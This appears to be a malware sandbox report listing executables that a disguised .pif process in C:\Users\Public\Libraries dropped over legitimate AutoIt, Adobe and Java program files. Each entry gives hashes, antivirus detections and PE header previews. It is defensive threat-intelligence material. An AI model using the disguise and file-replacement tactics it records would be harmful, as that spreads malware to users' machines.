                                                                                                                                                                                                                        SHA-256:3AF96ACD66A82D692D981447AA1F4E749B0004B5ED1310E86463C9C39D9F399E
                                                                                                                                                                                                                        SHA-512:C7D142FB9AE4C26D79AEC3EF6D7EE636CCDE6149200343C1F4F30B2F1BADC39A5A62B81C4264BBF94E6EF4829F770A3ED64E7FE4F1F998D33690D1824FCC4608
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... ......B......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1314304
                                                                                                                                                                                                                        Entropy (8bit):5.2741298149489975
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:3MEhwdbT0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pKdH0sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:EB9E3362ED7AAEE228EBE420B9278CF8
                                                                                                                                                                                                                        SHA1:58F764F9D71A60371BB33F82D0F31741897819CB
                                                                                                                                                                                                                        SHA-256:8A0C0385C44CC49CF75BE4626E7445E67CA8AAFF3F1EDFA1636B7EBD04C0D262
                                                                                                                                                                                                                        SHA-512:AD4EFD80F255B5705CAB1867EA45E5E5521AA4D34C9ABAC6DA45DC755348F06F4027A6013E2BD16E25167C7636378B664391B7A54E4EA409ECD66DB234817799
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !........... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2203136
                                                                                                                                                                                                                        Entropy (8bit):7.647028228244806
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:UK0eqkSR7Xgo4TiRPnLWvJYDmg27RnWGj:UK0pR7Xn4TiRCvJYD527BWG
                                                                                                                                                                                                                        MD5:FEF14850411DDA0057CB8080627E924E
                                                                                                                                                                                                                        SHA1:D906C35CA92672EE6615B59120AF2C0533F1750B
                                                                                                                                                                                                                        SHA-256:8016D4E7094716CE2939A5D8CB7182E7DD2FE5A5D8FA03448BA0E17225BCE69C
                                                                                                                                                                                                                        SHA-512:0BE9173EE67C36607AA07392E1E40A8F626D5CF1D8F9FE0BF59638F147CE6775B35E182B5D6DCAFCCC9864625D9993EDA0FA0A3F21BFF0F68BBE01CDC483E0DE
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".......!..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2369024
                                                                                                                                                                                                                        Entropy (8bit):7.565055213660454
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:0fYP1JsEDkSR7Xgo4TiRPnLWvJYDmg27RnWGj:0YPBR7Xn4TiRCvJYD527BWG
                                                                                                                                                                                                                        MD5:E93AB44839E7C99F5DA6DAC478ABCC22
                                                                                                                                                                                                                        SHA1:BEA13EF34C1F3ED22A5B502BADB4D45206CF8BDD
                                                                                                                                                                                                                        SHA-256:4B68C54F7E132D597EC3656D27BDC68E9079B397CB87175A7E407A9E75FD283E
                                                                                                                                                                                                                        SHA-512:5BD9EC41F22ABF534F55AAEB4D29D4E2BC04FA8489DEC41C66DF84B913A56A9AF3D09A3789616ACC23895AF927D1D8CACE24FC416780BBB42867975C402B7F0E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$......w$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1245184
                                                                                                                                                                                                                        Entropy (8bit):5.1235531492868684
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:u62SYUcknn6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:zYUckn6sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:FD0F16C283F990CDB6374558D3BC17A7
                                                                                                                                                                                                                        SHA1:38C5E732A1AC1E902E481FBA934F950891C0C647
                                                                                                                                                                                                                        SHA-256:CE0154101D58C6D7C56ADF263342E45771F1102C2AB3AE7FFB9FC4A3BD2DCF9D
                                                                                                                                                                                                                        SHA-512:54A6FFD6902D25366885C47DB57BA225EE64E8E0B468F5D2C4FD79825BD679F2D5DF03D11983FFF4F4410BBB881778A1FDA59C18F928FB989907D55BA0AD6E1E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@.......G.......................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1640448
                                                                                                                                                                                                                        Entropy (8bit):7.166637768180148
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:i+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaScDmg27RnWGj:mSktbpOD527BWG
                                                                                                                                                                                                                        MD5:2BB38F3CD523D5DBD1B69FCB513DB45F
                                                                                                                                                                                                                        SHA1:8D4F278C83000962C94170FA4311C9D3ED89E281
                                                                                                                                                                                                                        SHA-256:37F2B09E545F33C43207CAABDEA0AE7F98D531A32C252C150BB18C755FA1AD68
                                                                                                                                                                                                                        SHA-512:85BC9016CD58141A3419B74CE8465DFC1C17414B3D3181029ABC557CCED27E7E679501DAAE05CF5EC48559FAB7FABDDEC179FC4AF04115D48A271C71DD37A5E1
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.......................................... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2953728
                                                                                                                                                                                                                        Entropy (8bit):7.094597049390765
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:LGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLjDmg27RnWGj:T4OEtwiICvYMRfDD527BWG
                                                                                                                                                                                                                        MD5:36AB6B8B81D7C4D1F58A9BC7BC646EDD
                                                                                                                                                                                                                        SHA1:93FAD037C5970C710551042F05C090FC2EF6D460
                                                                                                                                                                                                                        SHA-256:DD47C9CD6D6ADC56318636297E8D7117D6E0FD06B9B98CDD748B8990B014E666
                                                                                                                                                                                                                        SHA-512:96AE5233D2073A753AC023257A43533CF17078A9395A6433DDCFF00409A2613B1BD1A4517296CF748493472F7F979A5A3F58BD1AF9BA1B180B72B932355BA394
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.....................................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1485824
                                                                                                                                                                                                                        Entropy (8bit):5.496373504578079
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:HAMuR+3kMbVjhYsqjnhMgeiCl7G0nehbGZpbD:gD+lbVjhEDmg27RnWGj
                                                                                                                                                                                                                        MD5:56CD71808ACF05929FE1B68FBCEE3CED
                                                                                                                                                                                                                        SHA1:0FDD9FE1FEB19008F7F912B8415EF37CD47F8B6F
                                                                                                                                                                                                                        SHA-256:27910A860633A0AC53D3579E5A0C9F90603CB4AF9CFCF0FA9C0BF0E7095913C0
                                                                                                                                                                                                                        SHA-512:4A21E5772D484E8F58844333DCE6D86030F0316D76B5F8EF6310A824D28D357AD5373C7E61571A4B4585693714EB4B95E00C70F2D2934E9EF4F68C71CDF5DA7C
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..................................J.......................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1290240
                                                                                                                                                                                                                        Entropy (8bit):5.277752246227892
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:yImGUcsvZZdubv7hfl30Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:yxGBcmlksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:BD3B960B1EFB321AF06FE54D1D30C855
                                                                                                                                                                                                                        SHA1:9CD255F0C702C0AF29D6DEB5AF7C3E0BEE0651A7
                                                                                                                                                                                                                        SHA-256:53CCE4F01997497F9C4BC4B6BF33174181AD69699C2307066F1FF3A368B5DEFA
                                                                                                                                                                                                                        SHA-512:FE1FC27185DF9920D83EA6B86F2DD0285389ED1BB11F217DCFBF340E137288823924E3ED9F1214E7CBFD6E79B26E35C42F3691B4B54C86B8123D9E6481512A52
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1644544
                                                                                                                                                                                                                        Entropy (8bit):5.694781502867505
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:o0vHyeLj8trn3wsqsqjnhMgeiCl7G0nehbGZpbD:ptj4rgs+Dmg27RnWGj
                                                                                                                                                                                                                        MD5:664CE19D6A9D8C49DE22D9C24D776C7F
                                                                                                                                                                                                                        SHA1:B4C41A4B4A6BF5788EA33E6DDB02B3BD759414AD
                                                                                                                                                                                                                        SHA-256:B6BC0A292FF623B33210EDFE145CF97155A9B4DA4DE9C346CDBACC7D7669EE32
                                                                                                                                                                                                                        SHA-512:21206D2EB113E82595ECB5B228D26FBF3FCA7798EE7F985A7A27B2DD519E43C77E74D36F6F6BF052F98B5A0C3C8C637D5A8293430777446CCAA7125AE60D17D6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`.......P......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1781760
                                                                                                                                                                                                                        Entropy (8bit):7.2796520285468524
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:eoMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZvsqjnhMgeiCl7G0nehbGZpv:b4i0wGJra0uAUfkVy7/ZTDmg27RnWGj
                                                                                                                                                                                                                        MD5:95FFC09729ABC66B558DF0EF7343B803
                                                                                                                                                                                                                        SHA1:F660F3CC7B38BCAF1673284E817F75430B7ED3C6
                                                                                                                                                                                                                        SHA-256:587062D8420A4E90B5B75202ACA9C8DC9E961246604E96293C6ECDAA8E13DDBE
                                                                                                                                                                                                                        SHA-512:161951D27ED9FB95A1AA9E9C6104FF788C4923083F17443EEF87C3F02A712C1373A8B04230585053027E60BA91F1B507955C09E4647A43C8C4C457E99DB2C143
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@............................................................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1318400
                                                                                                                                                                                                                        Entropy (8bit):7.448738764083758
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:KeR0gB6axoCf0R6RLQRF/TzJqe58BimQsqjnhMgeiCl7G0nehbGZpbD:GgHxmR6uBTzge5MimMDmg27RnWGj
                                                                                                                                                                                                                        MD5:7A4B29624BD70D7B7807095073F7C451
                                                                                                                                                                                                                        SHA1:0151D8D343B761DA7D6F6C56C8EC3EAE1A17C22C
                                                                                                                                                                                                                        SHA-256:E8B86A47128C990C02F35A433725C96B2602CD05D2735DC27F7ECBB3728AB872
                                                                                                                                                                                                                        SHA-512:2E2C9846AD709199FE1698466F83C50930D89A668BFB867AF0B3A500DC97ABFE57E3EA103E733282792DA5BC7FFCE0F0ADC30C33076F1D65F895AB9504E4CC42
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`..............................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1375232
                                                                                                                                                                                                                        Entropy (8bit):5.446047452618332
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:7nEbH0j4x7R6SvyCMaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:7kwOtO7asqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                        MD5:5DF2B9783C1A770CA79D3500BDB71758
                                                                                                                                                                                                                        SHA1:E9489A78FC1322D92801954D7B049EE8695ADDC9
                                                                                                                                                                                                                        SHA-256:8943CEC6DE36C516FDA64B9D97DB493EB61C8EA57827AC92FAA7E25714F378BD
                                                                                                                                                                                                                        SHA-512:B822F2F168CB7063A1501D3F4B8A46E3DE1A0349462A0A4F5307459240B7980856D22EE01DDD1BD95699E82A109786A258EA45207D744F62E6F4E99897FF2FFB
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1375232
                                                                                                                                                                                                                        Entropy (8bit):5.446808328635351
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:6nU/h/4KZsqjnhMgeiCl7G0nehbGZpbD:6U/VdDmg27RnWGj
                                                                                                                                                                                                                        MD5:9C392A3EA0F6FBAC0EFEBF4935223463
                                                                                                                                                                                                                        SHA1:1ED8FB566021837E216645DB73223E33E2529840
                                                                                                                                                                                                                        SHA-256:17B0ECAC9F680D11F097D42A852B62EC6BACB55B037437A12AFD992391426BD9
                                                                                                                                                                                                                        SHA-512:D0A24D1FCA3FC98C079C9A5E8CC2DD9674856C435964AEE14178A7E8B7A3B7A728B7700251D171F6E3804DF2B2D41E41B9932AF72578FC17EDD14AF82021FB36
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@..............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1513984
                                                                                                                                                                                                                        Entropy (8bit):5.483716331585078
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:yx71iBLZ05jNTmJWExGsqjnhMgeiCl7G0nehbGZpbD:yxhiHIjNgKDmg27RnWGj
                                                                                                                                                                                                                        MD5:ED719449EA36376991AAD182B6D80824
                                                                                                                                                                                                                        SHA1:1C5AAA288C578BFA9AB225BC79314FBF970AE32B
                                                                                                                                                                                                                        SHA-256:FB6839EE0109B6576BC4A1A09D7F0A46E62D95831A089CA4438D8D380C25DEB5
                                                                                                                                                                                                                        SHA-512:EFF13B82AD5D7B3649EAFC4F9352889586284F5BAED1F56C8C9A3F5924C247541D2FBBC5647E06DE49F6D9756703C9F61874B6A193C3951C4F48BD59BC32609F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@................................. ...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

